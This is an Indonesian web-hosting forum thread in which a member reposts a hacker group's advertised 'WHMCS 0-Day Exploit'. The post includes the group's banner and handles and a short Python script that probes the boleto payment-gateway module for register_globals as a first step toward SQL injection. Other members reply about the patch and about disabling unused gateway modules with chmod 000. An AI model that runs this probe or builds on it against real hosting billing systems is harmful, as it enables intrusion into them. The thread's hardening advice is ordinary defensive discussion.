WHMCS 0-Day Exploit #UGNazi


Status
Not open for further replies.
V

voezie

Hosting Guru
Sumber WHMCS 0-Day Exploit #UGNazi - Pastebin.com

__ __ _______ ____ __ __ | | | |/ _____| \ | | ______ _______(__)
| | | | / __| \| |/ __ |___ __| |
| |__| | |___\ \ |\ | (__| |___/ /_| |
\________/\_______/__| \___|\____/_|_______|__|
============================|Twitter.com/UG|=======================

---> Joshthegod > MrOsama > Cosmo > CyberZeist <---


"**** With The Best , Die Like The Rest"

Twitter.com/Ug
Twitter.com/Joshthegod
Twitter.com/Cosmothegod
Twitter.com/le4ky

==============================================================================

#UGNazi #Mybb #UGNaziwhmcs #Whmcs #fuckskids #hack #joshthegod #UG #Cosmothegod #MrOsama #dox

==============================================================================


########################################
# UGNazi 0 Day WHMCS Exploit
#######################################
import urllib2
import urllib
import os


def regglobcheck():
regglob1 = urllib2.Request('http://127.0.0.1/whmcs/whmcs_v451/whmcs/modules/gateways/boleto/boleto_bb.php?dadosboleto[identificacao]=test')
regglob2 = urllib2.urlopen(regglob1)
regglob3 = regglob2.read().count('test')
if regglob3 == 0:
rgen = 0
print " [+] Register Globals not enabled, no sqli on this whmcs install"
elif regglob3 >= 1:
rgen = 1
print " [+] Register Globals enabled, own it."


regglobcheck()
Click to expand...
 
cpserv

cpserv

Expert 1.0
itu kenapa kmaren ada update patchnya,, buat nutup hole si boleto itu.. tapi saya emang biasa matiin yang ga saya pake sih, misal semua gateway saya chmod ke 000 selain paypal sama payza/alertpay karena cm dua itu aja yang dipake. :D
 
hostguin

hostguin

Expert 1.0
GriyaHosting said:
set chmod 000 blank page di gateway page :D
Click to expand...

Khusus payment gateway di chmod 000 pasti blank page, caranya buat folder, pindahin semua kedalam folder baru tersebut, sisakan index.php dan module yang dipakai. Foldernya di chmod 000 juga ok. Langsung dihapus jg bisa :)

Untuk module lainnya seperti registar atau server di chmod gak masalah.
 
Status
Not open for further replies.

Top